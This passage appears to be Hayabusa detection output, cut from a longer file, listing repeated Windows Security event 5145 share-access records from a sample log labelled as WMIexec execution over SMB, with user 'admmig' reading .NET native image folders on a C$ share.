+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.544 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 